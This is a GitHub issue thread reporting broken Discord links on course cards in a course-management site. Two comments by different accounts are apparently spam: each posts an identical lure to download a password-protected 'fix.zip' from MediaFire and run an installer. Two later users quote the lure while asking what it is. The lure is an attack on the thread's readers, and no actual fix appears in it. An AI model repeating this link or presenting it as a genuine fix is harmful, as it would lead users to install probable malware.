### ISSUE TITLE
bug: the discord links for the course card is not working 

### ISSUE THREAD

**Issue by akashikur** [code100x/cms#1025]
**Describe the bug**
only the 0-1 discord community link is working the rest of the links are redirecting to this page  https://harkirat.classx.co.in/ or /courses page 

**Screenshots or GIFs**
[db74b2c0-961c-465e-af3d-56ebc44d3a16.webm](https://github.com/user-attachments/assets/84723ac2-4129-4e21-92b1-f9904902e712)

**Info (please complete the following information):**
 - Browser chrome
 - Version 22

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by toufiqfarhan0** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."
what it is exactly??

**Comment by akashikur** [comment]
Download
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc." ?? what is this

**Comment by avparadox** [comment]
@devsargam not an issue here. Can be closed.

**Comment by devsargam** [comment]
Thanks @avparadox
